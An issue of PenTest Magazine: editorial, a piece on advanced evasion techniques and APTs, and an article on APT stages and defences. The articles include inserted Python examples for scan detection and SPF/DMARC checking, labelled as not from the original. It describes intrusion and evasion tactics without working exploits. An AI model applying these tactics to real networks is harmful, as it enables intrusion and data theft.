EDITORIAL TEAM
Managing Editor: Bartłomiej Adach
Proofreaders & Betatesters: Lee McKenzie, Natalie Fahey, David Kosorok, Avi Benchimol, Tom Updegrove, Bernhard Waldecker, Girshel Chokhonelidze, Hammad Arshed, Matthew Sabin, Kevin Goosie, Ricardo Puga, Clancey McNeal, Ali Abdollahi, Craig Thornton.
Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their assistance there would not be a PenTest Magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Joanna Kretowicz (joanna.kretowicz@pentestmag.com)
DTP: Bartłomiej Adach (bartek.adach@pentestmag.com)
COVER DESIGN: Hiep Nguyen Duc
PUBLISHER: Hakin9 Media Sp. z o.o., ul. Postępu 17D, 02-676 Warszawa
Phone: 1 917 338 3631
www.pentestmag.com
All trademarks, trade names, or logos mentioned or used are the property of their respective owners.
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Dear PenTest Readers,
Another summer edition of our magazine is here, and it’s full of valuable infosec content. The two opening articles are related to the topic of Advanced Persistent Threats. Professor John Walker starts by presenting the interdependence of APTs and Advanced Evasion Techniques (AET). In the article he tries to answer the question why Persistent Threats and Evasions will not see any decline any time soon. Mariana Peycheva, in turn, presents an analysis of Advanced Persistent Threats and their methodology, giving a great overview of the topic. As one of our reviewers said: “I wish that most business leaders and managers would read this”.
Chris Cochran wrote a very interesting piece, which can be considered a guide for those building, executing, or consuming threat intelligence. Abhi Singh is the author of a thought leadership article on securing the API economy. It describes, at a high level, what kind of processes and architecture it would take to make a secure and resilient API ecosystem. Pal Patel provides the readers with a really interesting case study on the usage of the Right To Left Override technique. You should definitely check this article out and find out more about this interesting trick!
Two of our regular contributors, Bohdan Ethics and Dinesh Sharma, provided new articles this month as well. Bohdan brought to the table a presentation of antivirus evasion basics. Dinesh presents the readers with different types of compliance audits, with a special angle on critical infrastructure. Ankit Giri emphasizes the significance of mobile exploit applications in his article, Vlad Martin points our attention to the way in which black hats are collecting personal data in the Commonwealth of Independent States member countries, and, last but not least, David Evenden and Kent Potter present the Collegiate Cybersecurity Education Program that they developed together.
Special thanks to all of the contributors, reviewers, and proofreaders involved in the process of creation of this issue.
Without further ado,
Enjoy the content!
PenTest Magazine’s Editorial Team.
Contents
Long-Armed Persistence of Threats, Prof. John Walker ... 4
Advanced Persistent Threats – Silent But Smart, Mariana Peycheva ... 10
The Threat Intelligence EASY Button, Chris Cochran ... 17
Securing the API Economy, Abhi Singh ... 21
Right to Left Override (RTLO) Technique, Pal Patel ... 31
Antivirus Evasion Basics, Bohdan Ethics ... 35
Compliance Audit for Critical Infrastructure, Dinesh Sharma ... 55
The Significance of Mobile Exploit Applications, Ankit Giri ... 63
Black Hats: How They Are Collecting Personal Data in the CIS Countries, Vlad Martin ... 69
How StandardUser Is Working with Practitioners and Universities to Close the Talent Gap, Kent Potter and David Evenden ... 73
Long-Armed Persistence of Threats
Professor John Walker

22 years in Royal Air Force Security/Investigations and Counter Intelligence operations [Overt/Covert] service, working alongside GCHQ, CESG, UK and US Agencies, ITSO and Systems Security Manager for CIA Accredited Systems, Visiting Professor School of Science/Technology - Nottingham Trent University [NTU], Advisory Board, Research Centre in Cyber Security (KirCCS) at University of Kent, Mentor to Tallinn University (Estonia) Masters Students Cyber Research, Practicing and Registered Expert Witness, Certified Forensics Investigator Practitioner [CFIP], Editorial Member at MedCrave Research for Forensics & Criminology, ENISA CEI Listed Expert, Editorial Member of the Cyber Security Research Institute [CRSI], Digital Forensics/Cyber Security Listed Trainer at Meirc [Dubai] of Certified courses, and Fellow of Royal Society for the Arts [FRSA], writer for Apress Publishing New York, and a Belkasoft (Digital Forensics) Partner.

It was circa 2010/11 when I was approached by a Helsinki-based company – Stonesoft. Stonesoft wanted to discuss a new angled threat vector which they referred to as the AET (Advanced Evasion Technique). I agreed to meet with them at the InfoSecurity show of the day in London, and approached the conversation with more than a little skepticism - could this be yet another InfoSec over-hyped terminology? Surrounded with the usual InfoSecurity run-of-mill, mundane talk of the day, which in that year was PCI-DSS and, of course, Penetration Testing, it would be at least refreshing to learn about something new. With doubt in my mind, the conversation progressed, and I was introduced to this new hypothesis of this AET thing. As the conversation proceeded with my introduction to the AET, the theoretical value started to gain traction, and I found myself being pulled into what I had considered a concept, toward the fact that it was possibly a new threat vector with significant implications of insecurity.
The basics of the AET were to evolve and utilize evasion techniques as a means to disguise and/or modify
cyber-attacks through network connections, and to thus avoid detection by those deployed systems which
were supposedly delivering protection to the corporate valued assets. The objective here was, of course, to
achieve the successful delivery of hidden malicious content (payload), and the onward exploitation of a
vulnerable target host – here seeing Network Security Devices that are designed to conduct real-time, deep-
packet inspection of the network traffic rendered potentially ineffective resulting in:
• Critical digital assets left unprotected
• A false sense of security born out of dependencies on supposed secure, up to date commercial network
defenses
• Organizations left not meeting their regulatory compliancy requirements
• A higher success rate of encountered network attacks
• A shift in the Threat Landscape supporting opportunities of high reward (financial, strategic, political or
technical) for the ‘advanced’ tech-savvy cyber-criminals
Given that at the time of the AET threat first being made public, the Verizon Business 2010 Data Breach Investigations Report of the day stated that approximately 20% of incidents where malware had been discovered had an unknown component for the infection vector – which moves us down the road of Zero Days, a state which in 2019 has seen a significant leap forward in growth, combined with an increase in cross-platform threats – it may be thus reasonable to conclude that what was seen as a new threat in 2010/11 is now a threat vector with a close similarity to the Elephant in the Room!
The basis of the AET was simply to manipulate the IP Stack in such a way that the encountering IPS/IDS, or
firewalling technology would be confused by what its interface was seeing in the profile of a malformed stack,
and thus, in theory, would take one of, or a combination of, five actions:
1. Block
2. Allow
3. Alert
4. Write to the Log
5. Not write to the Log
At the time of the AET being made public, there were 180+ stackable and combinable evasions being researched in a testing framework, meaning that these built up to a potential set of attack vectors which were concluded to be impossible to counter across all combinations without some form of automated evasion testing framework; without such a framework, vendors were denied the opportunity to develop adequate anti-evasion capabilities and network defenses – a situation that gets worse under IPv6, which offers a vastly expanded combinatorial space for a malevolent cyber-universe, as described by Stonesoft’s Harri Haanpää:
“Evasion techniques are a means to disguise and/or modify cyber-attacks to avoid detection and blocking by
information security systems. They typically make use of rarely used protocol properties in unusual
combinations and deliberate protocol violations. Such obfuscations may confuse the detection capabilities
of intrusion prevention/detection systems.”
At the time of the early work into the AET, Jack Walsh, Program Manager at ICSA Labs, concluded that “Advanced Evasion Techniques can evade (and did) many network security systems.” He went on to comment, “we were able to validate Stonesoft’s research and believe that these Advanced Evasion Techniques can result in lost corporate assets with potentially serious consequences for breached organizations.” To add to the weight behind what was then, and to a large extent still is, an ignored threat, Bob Walder, Research Director at Gartner, commented, “Recent research indicates that Advanced Evasion Techniques are real and credible – not to mention growing – a growing threat against the network security infrastructure that protects governments, commerce and information-sharing worldwide. Network security vendors need to devote the research and resources to finding a solution.” – and yet at that time, and even today, the threats are still largely ignored, or should I say tolerated.
However, up to this point in time, I was only listening to the theoretical description of the threat of this new
‘AET’ conversation, but I was interested enough to agree to work alongside Stonesoft and visited their labs in
Helsinki to see the pragmatic side of the conversation. At the site within their lab conditions, the highly skilled
Stonesoft Team demonstrated testing against a variety of the latest release, up-to-date firewalling products for
their exposure to the AET threat, and the discoveries were astonishing, with results for all tested devices of:
• Bypass of the perimeter device to reach a supposedly protected asset
• Logs not being updated, or annotated with the wrong information
Upon returning from my visit, I was convinced that the new age AET threat was real and along with Stonesoft
wrote a paper on the subject. However, as one always encounters in the Cyber Security Industry, that paper
and the research of Stonesoft was challenged, with one of the most vocal being from McAfee who denounced
the research outright – interestingly enough, notwithstanding their public opinion on the AET, McAfee acquired
Stonesoft for $389 million in 2013 - I can only conclude that the paper and research they denounced must have
struck a note which enticed them to put their hands in their pockets of denial!
On the associated subject of the APT (Active Persistent Threat), we can see the emergence of the AET into a
new combined landscape of network dangers – dangers I have observed first hand inflicting breaches and
compromises on the supposedly protected end-points, resulting in the bypass of firewalls, IDS, and IPS alike.
However, it is here where we start to see the strain of ignored system updates taking their toll. For example, the
continued use of out of patch operating systems, like seventeen year old Windows XP, which saw the massive
and successful WannaCry attack on the NHS, which cost the taxpayer £92 million, and resulted in the
cancellation of over 19,000 appointments – some of which had real-world, life inflicting consequences. It is also
still possible to see the old approach where Internal systems are not maintained with an adequate security
profile on the premise that they are hidden from the external interface that points to the dangerous outside
world, and thus are not accommodated by Anti Malware Protection, or as I encountered at an Oil and Gas
company any form of logging set against systems/folders storing critical data assets. In such cases as these,
the AET and the combination of the APT are ideal partners, with the AET serving up the means by which to
avoid detection and to deliver its payload (the APT), with the APT taking on the profile of, say, the Conficker
agent, which is a great little bit of malware to create a shell condition on its vulnerable targeted system – and
from there if the attacker is lucky enough, they will find other routine on-system tools such as the Windows
Management Instrumentation Command line (WMIC (wmic.exe)), which offers a multitude of intelligence
gathering and compromise opportunities - and then there is the much forgotten dangers from the world of DNS,
which can leave a great big black-hole open in the style of a Cuckoo’s Egg attack leveraging on a Zone Transfer
to quietly discover internal gems, which in one first-hand case concerning an East Midlands based Credit
Reference Agency, allowed the acquisition of a script containing a hard coded User ID and the associated
Password – and then of course onward potentials for compromise!
[Figure: wmic.exe]
Having started off circa 2010, we now move into the year 2019 in which we still see the risks and attack vectors
of the AET and APT at an all-time-high, and this against a backdrop of a higher than ever spend on security,
alongside the associated growth of complexities of a cyber-dependent, always connected business and social
society – a world, according to McAfee some years back, in which they were winning the Cyber-Security Race
– I think not! The time is here where we need to ask the right questions about our level of deployed defenses,
starting with those shown in the below image:

1. Security Level Evaluation/audits of existing security devices
   Do evasions pose a threat to us (or not)?
   Have we evaluated security risks correctly, and are we managing these risks?
2. New Product Evaluation for investment decisions
   Which product offers highest protection against evasions?
   How can I verify vendor claims?
3. Redesigning network security
   Is our security level high enough?
   Where to place or relocate IPS/deep packet inspection devices? And what kind?

So, where are we today? Evidenced by the long list of breached and compromised organizations who have invested small fortunes and placed their ultimate trust in commercial devices and staff to defend their technology-kingdoms, one may only conclude that Persistent Threats and Evasions are not seeing any demise soon, and the question must be asked: what is going wrong? Is it that:
• The reliance on the over-priced commercial promise, the Silver Bullet security device, with over-expectation of its actual capabilities to defend the network, is flawed?
• We have gone down the long path of a Tick-Box Compliance led security approach so far that we have parted company with the bits-and-bobs of technical security skills?
• The Skills Gap issue in the Cyber Space is now hitting its mark with an adverse effect?
• Under-maintained, over-exposed assets residing on the network add to the conundrum of insecurity?
• Or finally, as with the combination of an AET with the APT, is it that the aforementioned all have their own part to play in a world that will assure the Persistent Threats will continue to evolve and bite!
Looking back over the years from 2010 right up to 2019, what is so very interesting is that the only thing that
has changed is that the situation of insecurity has become far worse in a world in which Persistent Threats are
ever present, and being leveraged by a range of adversarial actors, from those with quick-win monetary gain in
mind, to the state-sponsored activities of the geopolitical aggressors, not to mention the groups of
commercially motivated serious and organized crime gangs. Thus, time is now long past that dictates a fresh
way of delivering agile cyber-defense is now a must have, with the recognition that something, somewhere
must change if we are to win the cyber-security race. No matter what we deploy, and how we operate those
commercially procured systems and applications, one fact is certain – we will encounter a Persistent Threat on
an every-day basis in some form – it may be a matter of such encountered threats are passive, awaiting their
time to go malevolent at their opportune moment; or, active and already on a mission to avoid detection whilst
delivering payload. It is now time to act, and look at Cyber-Security in a new way, with joined up thinking, along
with a recognition and guarantee that we have been or will be breached. We must start to evolve the mindset of
deployed states of readiness that are associated with the recognition that the proactive defenses may be (are)
flawed, and take up a robust posture on the reactive side of ‘Response’ to underpin structured engagements
and recovery from the most adverse of anticipated known-unknown conditions of the Persistent Threat. Above
all, we must deploy our infrastructures from the ground up in a well formed, well documented and potentially
segmented way to take into account that the Persistent Threats will be seeking to leverage and exploit any one
of many combinations of exposure opportunities to deliver their show-stopping payload!
Advanced Persistent Threats – Silent But Smart
Mariana Peycheva
Mariana Peycheva is CSO for the Unified Communications and Collaboration division of Atos.

According to a study by ISACA, phishing is the most common way of launching an APT, as it gives the attacker an opportunity to gain initial access to the organization, and considering the human factor as one of the biggest vulnerabilities makes the defense mechanism against initial attacks very difficult to design. It was evident from the study that 53.4% of the people believe APT is not much different from traditional attacking methods. However, 93.9% of the people agreed that APTs pose a significant threat to national security and economic stability. Among the critical findings in this survey paper are that 63% of the people believe that it’s just a matter of time before their organization becomes a victim of an APT attack, while only 60% believe that they are capable enough to stop such an attack.

Introduction
The term Advanced Persistent Threats, or APT, featured in the general terminology of the information security profession in mid-January 2010 when Google announced that its intellectual property was a victim of a targeted attack originating in China. Google is not the only one; more than 30 other technology companies, military contractors and large enterprises have been hacked by hackers who used a suite of social engineering, targeted malware, and surveillance technologies to secretly gain access to piles of sensitive corporate data [1].
Google's public recognition has raised the issue of targeted long-term attacks by well-prepared attackers
seeking access to corporate property and military information. It also launched a series of vendors promoting
promising anti-APT products and services that only obscure the issue for security managers and activity
managers [1].
The US Air Force built the phrase Advanced Persistent Threats in 2006, as their teams needed to communicate
with partners in the unclassified public administration world. People from the Department of Defense usually
give classified names of specific threats and attackers and use them to describe the activities of participants in
those threats. If the Air Force wants to talk about some intrusion with other personnel, they would not be able
to use the classified name of the actor in the threat. Therefore, they built the term APT as an unclassified
nickname [1]. At early stages, such attacks were dedicated to government or financial organizations, but now
the domain is much larger.
APTs target specific actors in the threats; APTs do not refer to vague and shady internet powers. The term is
most commonly applied to various groups operating in the Asia-Pacific region. Those who are familiar with APT
activities may have an honest dispute about whether the term should be used to refer only to some participants
in the Asia Pacific region [1] or whether it can be expanded as a general classifier. In other words, if criminals
from Eastern Europe work using the same tools, tactics, and procedures as traditional APTs, will these actors
also bear the APT label?
The answer to this question depends on the person asking it. An IT security specialist in a private organization
will usually not be interested in whether the participants in the threat attacking the company are from Asia and
the Pacific or Eastern Europe. The reason they perform the same defensive actions, regardless of the location
or nationality of the opponent. However, anyone with legal and/or national security responsibility who
implements diplomatic, intelligence, military or economic measures will undoubtedly want to determine the
origin of an attack [1].
For a long time there was no clear understanding of what APT is. Several factors contributed to the overall sense of confusion:
• With no details to discuss, the security community turned to just about anyone ready to talk about the
incident. In too many cases, speakers have turned out to be providers who saw APT as a marketing
opportunity to recover fast-falling security costs [1].
• Many analysts are strictly focused on the elements of the incident that they understand best, irrespective of
the true nature of the event [1]. Companies that specialize in botnet research assume that botnets were
involved, others focused on vulnerability identification and breach development. Unfortunately, botnets have
nothing to do with APT, and vulnerabilities, breaches, and malware are just elements of APT incidents, not
their core functions.
• Impact of APT - Economic advantages, strategic benefits, stealing sensitive information, so the goals can be political such as undermining internal stability or economic goals based on the theft of victims' intellectual property. Logically there are technical objectives that extend the ability to complete the mission. These include gaining access to source code to develop breaks further or to study the work of security to conquer better or break it. The most worrying thing is that attackers can make changes to improve their positions and weaken the victim [1].
Analysts rate APT activities as having four main goals and describe the enemy as follows:
Advanced means that opponents can act across the spectrum of a computer attack. They can use the most
trivial, easily accessible breakthroughs against well-known vulnerabilities, or elevate their game to exploring
new vulnerabilities and develop specific breakthrough methods that depend on the situation of the target.
Persistent means that the enemy has the specific task of completing his mission. These are not casual
attackers. They receive directives from their bosses in the same way as an intelligence group. Being
persistent does not necessarily mean that they are continually executing malicious code on victims'
computers [1]. Instead, they maintain a certain level of engagement necessary to fulfill their purpose.
The threat means that the opponent is not a piece of meaningless code. It is a threat that is organized,
funded, and motivated. Some people talk about many "groups" consisting of specialized "crews" with a
variety of missions [1].
The traditional attack is usually performed by one person: aggressive, very rapid, smash and grab, a tactic based on a minimal-time attack. An APT, by contrast, consists of repeated attempts using several methods, a stealthy approach that adapts to resist defenses, very slow so as to avoid any suspicion, and may involve sleep modes before commencing any attack [2].
As was already mentioned, there are cyber espionage groups associated with various APT attacks.
In 2018, TrendMicro security researchers reported an attack using Android malware matching Bahamut’s code
(Mobile Device Management (MDM) tool detected in a campaign targeting iPhone devices in India), but which
connects to its command and control (C&C) infrastructure.
Some of these C&C’s, which also act as phishing sites, attempt to lure users into downloading malicious
applications via links to Google Play. Such kind of applications and codes can retrieve network information and
the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with
specific extensions, even steal screenshots of messages.
In short, APT is an adversary who performs bold operations (called networked computer operations) to maintain
information about the status of their goals.
APT is characterized by its persistence in maintaining some degree of control over the target's computer
infrastructure, acting continuously to preserve or restore control and access. At informal counterintelligence and
the military meetings, their analysts use the term "aggressive" to emphasize the extent to which APT pursues
its goals against the various governmental, military, and private targets.
Let’s take a deeper look at the APT methodology:
The APT attack is based on four or five stages, but generally, it can be summarized as breaking in, scanning the network, identifying the target, making it accessible to accomplish the goal, and escaping the network without leaving any trace or evidence [2].
1. At stage one, the attacker can use different techniques like social engineering, open-source intelligence tools
(OSINT) or approaching an organization which sells data or information about multinational firms. This step
aims to know the target and gather as much information as possible about it.
As there are countless ways to conduct the initial step of infiltrating, defining a security baseline or a model to
stop the initial attack is quite a challenge. Having in mind the persistent approach in APT, it is only a matter of
time for an attacker to find a backdoor in security mechanism [2].
2. At stage two – breaking in. We can expect that the attacker will exploit the weakness and gain access to the target network. They can use an indirect approach technique such as spear phishing, a watering hole attack, or a zero-day virus to infiltrate and deploy any remote access tool for further activities.
A common approach is the use of email combined with social engineering – a targeted user receives a link in an email from a seemingly reliable person or source, bringing the user to a linked website which contains a malicious JavaScript payload that the browser downloads and executes. They can simply send an attachment in the email purporting to come from a reliable source, or just use an infected USB device which, when attached to a Windows-based system, will auto-execute malware without user interaction by utilizing a zero-day vulnerability.
A different approach, defined as direct, is easy to understand – the attacker can compromise any third party working at the organization and use their privileges to gain access to any system or server [2].
Identifying target – as the definition suggests, in this stage, the attacker searches and identifies the target
data. The chances of being caught are quite high, as the attacker will be scanning the network for its target and
this could result in abnormal traffic behavior or trespassing of data files or access violations on the network [2].
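The "abnormal traffic behavior" of this stage is something a defender can look for in ordinary flow records, without any knowledge of the attacker's tooling. The Python below is an added example, not from the article or its references. It parses a handful of constructed flow lines (timestamp, source, destination, destination port; the format is my own assumption) and, for each source, computes over a sliding one-minute window the largest number of distinct destination hosts it touched (a horizontal sweep) and the largest number of distinct ports it tried on a single host (a vertical probe), raising an alert when either passes a threshold. The thresholds are illustrative; in practice they are tuned per segment, and a known vulnerability scanner's address is allow-listed.

```python
"""Spot the 'identifying target' stage in flow logs: one internal source
reaching unusually many hosts, or unusually many ports on one host, within
a short window. Added example; the records below are constructed, not real."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import DefaultDict, Dict, List, Set, Tuple

Flow = Tuple[datetime, str, str, int]  # (timestamp, src, dst, dst_port)

# Constructed sample log. Assumed line format: ISO timestamp, src, dst, dst port.
SAMPLE_LOG = "\n".join(
    # horizontal sweep: one source touches twelve hosts on one port in 12 s
    [f"2019-07-01T09:00:{i:02d} 10.0.5.23 10.0.5.{40 + i} 445" for i in range(12)]
    # vertical probe: one source walks sixteen ports on a single host
    + [f"2019-07-01T09:10:{i:02d} 10.0.5.50 10.0.5.9 {1000 + i}" for i in range(16)]
    # ordinary traffic that must not alert
    + ["2019-07-01T09:00:05 10.0.5.77 10.0.1.10 443",
       "2019-07-01T09:00:07 10.0.5.77 10.0.1.11 53",
       "2019-07-01T09:00:09 10.0.5.77 10.0.1.10 443"]
)


def parse_flows(text: str) -> List[Flow]:
    """Parse whitespace-separated flow lines; blank lines are skipped."""
    flows: List[Flow] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, src, dst, port = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return flows


def window_stats(events: List[Tuple[datetime, str, int]],
                 window: timedelta) -> Tuple[int, int]:
    """For ONE source's (ts, dst, port) events sorted by time, return
    (max distinct hosts in any window, max distinct ports to one host in any window)."""
    max_hosts = 0
    max_ports = 0
    start = 0
    for end in range(len(events)):
        # advance the window's left edge until it spans at most `window`
        while events[end][0] - events[start][0] > window:
            start += 1
        in_window = events[start:end + 1]
        hosts: Set[str] = {dst for _, dst, _ in in_window}
        max_hosts = max(max_hosts, len(hosts))
        ports_by_host: DefaultDict[str, Set[int]] = defaultdict(set)
        for _, dst, port in in_window:
            ports_by_host[dst].add(port)
        max_ports = max(max_ports, max(len(p) for p in ports_by_host.values()))
    return max_hosts, max_ports


def scan_suspects(flows: List[Flow], window: timedelta = timedelta(seconds=60),
                  host_threshold: int = 10,
                  port_threshold: int = 15) -> List[Tuple[str, str, int]]:
    """Return (source, kind, count) alerts; kind is 'horizontal' or 'vertical'."""
    by_src: Dict[str, List[Tuple[datetime, str, int]]] = defaultdict(list)
    for ts, src, dst, port in sorted(flows):
        by_src[src].append((ts, dst, port))
    alerts: List[Tuple[str, str, int]] = []
    for src in sorted(by_src):
        hosts, ports = window_stats(by_src[src], window)
        if hosts >= host_threshold:
            alerts.append((src, "horizontal", hosts))
        if ports >= port_threshold:
            alerts.append((src, "vertical", ports))
    return alerts


if __name__ == "__main__":
    for src, kind, count in scan_suspects(parse_flows(SAMPLE_LOG)):
        print(f"{src}: {kind} probe, {count} distinct targets within one minute")
```

On the constructed sample the two scanning sources are reported and the third, which only talks to two servers, is not. The sliding window rather than a fixed bucket matters: an attacker who paces probes across a bucket boundary would otherwise split their count in two. A slow APT can still pace below any threshold, so this catches the noisy phase the article describes, not the patient one; the same counters computed per day rather than per minute are the complementary, low-and-slow view.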
If the attacker succeeds in identifying the targets, they have to make them accessible or acquire the appropriate rights
to access that data. Rootkits can also be secretly installed on targeted systems and network access points to
monitor or capture data and commands as they stream over the network. The captured information can be
utilized to give invaders the information they need to plan future attacks or to make target data accessible. At
this stage, being persistent is a key feature for stealing the information [2].
Fleeing the network - Finally, the hacker will try to escape and cover the tracks, so that it becomes more
challenging to identify the attacker and to detect the damage done. In some cases, the attacker uses APT to
gain long-term access or to drop a back door so that the network can be accessed whenever required [2].
APT is an approach based on phases. Usually, 3 to 4 stages and most of the organizations are not even aware
that an APT attack happened on their network [2].
How to protect from APT?
This is not a simple attack, but logically designed and composed of numerous hacking tools and processes
following a sophisticated pattern to achieve its objective. The victim is “inspected” constantly over a long
period. The attackers are not “Script Kiddies” but possess a high level of knowledge and plenty of resources so
we should not expect a simple solution. Many of the “classic” security tools are unable to manage this
purposeful and previously considered attack. For example, when using software that may be untrustworthy, it
is essential to use it in a sandboxed area so that other software, files, and applications are not compromised
[3]. If no adverse actions are detected after a while, then it is assumed that the code is safe, and it is allowed to
execute. But the malware developers are smart, and they can bypass this detection technique by having their
code sit dormant for days or even weeks before activating and wreaking havoc.
To react to this threat first, we shall discover and analyze it.
The network traffic analysis, which follows the traffic and applications, is one of the needed components in the
layered designed defense. Ideally, there will be an engine that identifies malware and activities signaling an
attempted attack. A detection intelligence can aid your rapid response.
Email security is a highly escalated topic nowadays. Different advanced malware detection techniques identify
and block the spear-phishing emails. As we discovered from an example structure of the attack, the phishing is
the initial phase of most targeted attacks. They can discover malicious content, attachments, and URL links
that pass unnoticed through standard email security.
Endpoint security - Monitoring that records and reports detailed system activities to allow threat analysts to
assess the nature and extent of an attack rapidly. It is also a mandatory part of a sophisticated defense
technique. Most forms of malware and advanced persistent threats enter the enterprise through vulnerable
endpoints [4].
Detecting malware based on file signatures or blacklisting has proved to be a very inefficient technique in the fight against APT.
Following the customer needs, the security vendors have started to take radically new approaches to
combating malware and APTs.
For example, Trend Micro Deep Discovery solutions for network, email, endpoint, and integrated protection provide advanced threat protection [5]. It was designed as a management solution for large enterprises and government organizations. It provides network-wide visibility, a significant control needed in this kind of protection; detection engines focused on identifying advanced malware and human attackers; and a real-time dashboard presenting the in-depth analysis and actionable intelligence required to prevent, discover, and contain attacks against corporate data, alongside a console providing real-time threat visibility and detailed scrutiny in an intuitive multi-level format. With that, security professionals can focus on risks and deep forensic analysis, and rapidly implement containment and remediation procedures [6].
Advanced Persistent Threats – Silent But Smart
Trend Micro is certainly not the only vendor focusing its attention on APTs. McAfee claims that its Advanced Threat Defense combines in-depth static code analysis, dynamic analysis (malware sandboxing), and machine learning to increase zero-day threat detection, including threats that use evasion techniques and ransomware, which allows hidden risks to be uncovered. Alongside the threat intelligence sharing option, which makes immediate sharing of threat intelligence across the entire infrastructure possible, the solution supports offline analysis options, and advanced features enable security operations centers to validate threats. The centralized analysis covers multiple protocols and recommended products, including email gateways.
Going through other vendors, we will surely find that most of them provide sophisticated solutions which can support security professionals in their efforts against APTs.
To conclude, an APT is a layered attack. Therefore, the defense should be designed in layers too. Start with internal phishing campaigns, whose aim is not to “catch” the unprepared employee but to give us a clear understanding of how vulnerable the human factor in the organization is. There should be procedures and policies that implement regular and mandatory training for employees: how to recognize phishing, how to report it, and how to protect themselves and the enterprise. Security professionals should never forget that the employees are the first line of defense. Other policies can forbid any server outside the company premises from sending email on behalf of the organization’s domain (published as SPF and DMARC records in DNS, so that receiving gateways can enforce it), combined with operational security on the email gateway. Other functional security techniques should be implemented regularly at the mail gateway level, and there are many good alternatives already offered by vendors.
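The email-domain policy just mentioned is usually enforced through SPF and DMARC records in DNS. As an added example that is not part of the original article, the following Python models such a policy for a fictitious domain and evaluates constructed sender addresses against it. The DNS answers are an in-memory table standing in for real lookups, and the domains, addresses and record contents are assumptions; only the ip4, ip6, include and all mechanisms are implemented, and DKIM is not evaluated.

```python
"""Added example: evaluating an SPF/DMARC policy at a mail gateway.

Not code from the article. DNS answers come from a constructed in-memory
table (no network lookups); domains and addresses use documentation ranges.
Only the ip4, ip6, include and all mechanisms are implemented, and DKIM is
ignored, so a real gateway would still let an aligned DKIM pass rescue a
message that fails SPF.
"""
import ipaddress

# Constructed TXT records standing in for DNS (assumption).
DNS_TXT = {
    # Only the corporate relay range and a contracted bulk-mail vendor may
    # send as example.com; everything else is a hard fail.
    "example.com": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailvendor.example -all",
    "_spf.mailvendor.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 -all",
    "_dmarc.example.com": "v=DMARC1; p=reject; rua=mailto:dmarc@example.com",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_txt(name):
    """Stand-in for a DNS TXT query."""
    return DNS_TXT.get(name)


def spf_check(ip, domain, depth=0):
    """Return the SPF result for a connecting IP that claims to send as `domain`.

    Result names follow RFC 7208: pass, fail, softfail, neutral, none, permerror.
    Mechanisms other than ip4/ip6/include/all are treated as non-matching.
    """
    if depth > 10:  # RFC 7208 caps DNS-querying mechanisms at 10 per check
        return "permerror"
    record = lookup_txt(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term == "all":
            return QUALIFIERS[qualifier]
        mech, _, arg = term.partition(":")
        if mech in ("ip4", "ip6"):
            # An IPv4 address never matches an IPv6 network and vice versa.
            if addr in ipaddress.ip_network(arg, strict=False):
                return QUALIFIERS[qualifier]
        elif mech == "include" and spf_check(ip, arg, depth + 1) == "pass":
            return QUALIFIERS[qualifier]
    return "neutral"  # record exhausted without an explicit "all"


def dmarc_policy(domain):
    """Parse the _dmarc TXT record into a tag dictionary ({} when absent)."""
    record = lookup_txt("_dmarc." + domain)
    if not record:
        return {}
    tags = {}
    for part in record.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            tags[key] = value
    return tags


def gateway_decision(ip, mail_from_domain):
    """Combine the SPF result with the domain owner's DMARC policy.

    Returns 'accept', 'quarantine' or 'reject'. Anything but an SPF pass
    counts as a DMARC failure here because DKIM is not evaluated.
    """
    if spf_check(ip, mail_from_domain) == "pass":
        return "accept"
    policy = dmarc_policy(mail_from_domain).get("p", "none")
    if policy in ("reject", "quarantine"):
        return policy
    return "accept"  # no DMARC policy: the receiver only annotates the message


if __name__ == "__main__":
    for sender_ip in ("203.0.113.25", "198.51.100.10", "192.0.2.7"):
        print(sender_ip, spf_check(sender_ip, "example.com"),
              gateway_decision(sender_ip, "example.com"))
```

The `-all` at the end of the record is what turns the policy into a hard statement; with `~all` the gateway would only softfail the spoofed message, and without a DMARC `p=reject` most receivers would merely annotate it.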
Good security protection at the host level is needed, plus tools that let security teams monitor end-system behavior offline or, even better, integrate automated intelligence.
As discussed, the network security layer should be armed with network traffic analysis tools that recognize malicious behavior.
And finally, the organization should invest in good security professionals; different security knowledge is needed among the different teams. Leaders should understand well that investment in their employees, continuous education and clarification, and better knowledge is mandatory.
According to a study by ISACA, phishing is the most common way of launching an APT, as it gives the attacker an opportunity to gain initial access to the organization; considering the human factor as one of the biggest vulnerabilities, this makes the defense mechanism against initial attacks very difficult to design. It was evident from the study that 53.4% of the respondents believe an APT is not much different from traditional attacking methods. However, 93.9% agreed that APTs pose a significant threat to national security and economic stability. Among the critical findings of the survey are that 63% believe it is just a matter of time before their organization becomes a victim of an APT attack, while only 60% believe they are capable enough to stop such an attack [2].
The most effective fight against APTs is having trained and knowledgeable information security analysts. Many security providers have adopted APT in their marketing. Some offer the opportunity to detect APTs in the potential victim's networks. Another has even registered APT domain names. Tools are always helpful, but the best advice I can provide is to educate business leaders about threats so that they support organizational security programs drawn up by competent and knowledgeable employees [1].
An APT can be considered as one of the most threatening security concerns. As the world advances towards
IoT (Internet of things), certain measures need to be taken so that APT attacks can be handled with ease [2].
At a technical level, building visibility will provide the organization with an awareness of the situation and a
chance to detect and thwart APT activity. Without information from the network, hosts, logs, and other sources,
even the most skilled analyst is rendered helpless. Fortunately, obtaining such information is not a new
challenge, and most security departments are already using such programs [1].
The purpose of combating APT operations should be to make it as difficult as possible for an adversary trying to steal intellectual property or, as some say, to increase its price per megabyte.
References:
1. https://searchsecurity.techtarget.com/magazineContent/Understanding-the-advanced-persistent-threat
2. https://pdfs.semanticscholar.org/c6c3/06e7e4253885bd2d0ed25b8f2524fbbb2a92.pdf
3. https://www.techopedia.com/definition/25266/sandboxing
